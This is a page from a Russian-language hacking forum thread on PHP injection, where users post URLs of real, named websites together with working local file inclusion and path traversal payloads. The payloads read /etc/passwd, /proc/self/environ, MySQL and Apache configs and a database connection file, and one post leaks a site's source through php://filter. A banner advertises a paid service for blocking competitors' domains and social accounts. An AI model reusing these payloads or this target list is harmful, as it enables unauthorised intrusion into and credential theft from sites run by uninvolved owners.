PHP Иньекции — ANTICHAT Forum

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
PHP Иньекции

Страница 124 из 143

124

Опции темы

Поиск в этой теме

Опции просмотра

#1231

16.01.2011, 20:23

dirtybiz

Новичок

Регистрация: 28.10.2010

Сообщений: 28

Провел на форуме:
7876

Репутация: 0

Цитата:

Сообщение от None

http://diuf.unifr.ch/pai/education/2006_2007/ca/index.php?page=../../../../../../../../../../../../../../etc/passwd

PR ~6, в индексе почти 20 000 страниц может куми-нибудь пригодится)

#1232

24.01.2011, 19:07

Gedj

Познающий

Регистрация: 15.09.2008

Сообщений: 54

Провел на форуме:
612815

Репутация: 46

Код:

http://www.tierhilfe-spanien.de/thspa.php?inc=../../../../../../../etc/passwd%00
http://www.albersfoundation.org/Albers.php?inc=../../../../../../../../../etc/passwd%00

#1233

17.02.2011, 21:40

rootmd

Участник форума

Регистрация: 09.12.2010

Сообщений: 101

Провел на форуме:
23579

Репутация: -5

h_ttp://www.kemtipp.ru/show.php?f=../../../../etc/passwd

#1234

17.02.2011, 23:54

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

http://www.sintraems.org.br/main.php?pg=/proc/self/environ

Header:

Код:

Host
User-Agent :
Accept
Accept-Language
Accept-Encoding
Accept-Charset
Keep-Alive
Connection

#1235

19.02.2011, 16:45

Komyak

Участник форума

Регистрация: 15.01.2009

Сообщений: 158

Провел на форуме:
469704

Репутация: 26

Код:

http://www.ra-dar.ru/index.php?path=../../../../etc/passwd
http://www.ra-dar.ru/index.php?path=../htdocs/

#1236

25.02.2011, 22:16

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

http://www.racetools.de/index.php?page=/etc/passwd

http://www.soulbrasil.com/index.php?page=/proc/self/environ

http://www.eschoolbc.com/?page=../../../../../../../../../../proc/self/fd/2%00

http://www.undp.org.al/index.php?page=../../../../../../../../../../proc/self/fd/14%00

http://www.bornathleticstore.com/blog.php?page=../../../../../../../../../proc/self/environ

http://www.modelspromo.com/index.php?page=../../../../../../../../../../../../etc/my.cnf

http://www.placeneeded.com/index.php?page=../../../../../../../../../../var/log/dmesg

http://www.keewatinmaritimemuseum.com/?page=../../../../../../../../../../../proc/self/fd/7

http://www.gardenhoodatlanta.com/admin/index.php?page=../../../../../../../../proc/self/fd/1

http://www.khandelwalweds.com/index.php?id=../../../../../../../../proc/self/maps

http://www.asuslaptop.com/index.php?page=../../../../../../../../../proc/sys/../self/cmdline

#1237

11.03.2011, 16:44

nemaniak

Участник форума

Регистрация: 10.06.2008

Сообщений: 201

Провел на форуме:
1174919

Репутация: 229

http://www.avionews.com/index.php?corpo=../../../../../../../../../../etc/passwd

#1238

18.03.2011, 21:18

Lestatkiy

Познающий

Регистрация: 27.09.2010

Сообщений: 50

Провел на форуме:
15203

Репутация: 5

http://www.dailymail.com/ap/ApWorld/201103181127?page=../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00

#1239

21.03.2011, 03:00

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

http://www.matchplaytennis.com/index.php?page=php://filter/convert.base64-encode/resource=index

PHP код:


		
			
[COLOR="#000000"]
[COLOR="#0000BB"]';

    

    /*

        Check for the page variable.  If it is empty or

        uninitialized, set it value to the default or

        home page.

    */

    

[/COLOR][COLOR="#007700"]if ( isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]]) || !empty([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]]) )

    {

    

[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]];

        

            

    }else{

[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"home"[/COLOR][COLOR="#007700"];

    }

[/COLOR][COLOR="#0000BB"]$sanitycheck[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"http"[/COLOR][COLOR="#007700"]);

    

    

    

    if ([/COLOR][COLOR="#0000BB"]$sanitycheck[/COLOR][COLOR="#007700"]===[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#FF8000"]// Include the specified page.

        //include(realpath(basename($page)));

[/COLOR][COLOR="#007700"]include([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]".php"[/COLOR][COLOR="#007700"]);

    } 

    else {

        die([/COLOR][COLOR="#DD0000"]"Possible PHP Injection Attack"[/COLOR][COLOR="#007700"]);

    }    

    

[/COLOR][COLOR="#FF8000"]//echo "";

     // Diplay the footer

[/COLOR][COLOR="#007700"]require_once([/COLOR][COLOR="#DD0000"]"footer.php"[/COLOR][COLOR="#007700"]);

?

[/COLOR][/COLOR]

интересная протекция )

#1240

21.03.2011, 17:13

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

читалюга

http://www.vintagetoys.com/help.php?template=../../../../../../home/twinkles/public_html/dbconnection.php%00

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/COLOR][/COLOR]

Страница 124 из 143

124

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Books	PSalm69	Избранное	273	13.02.2016 01:24
Books PHP	FRAGNATIC	PHP	186	21.02.2010 02:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход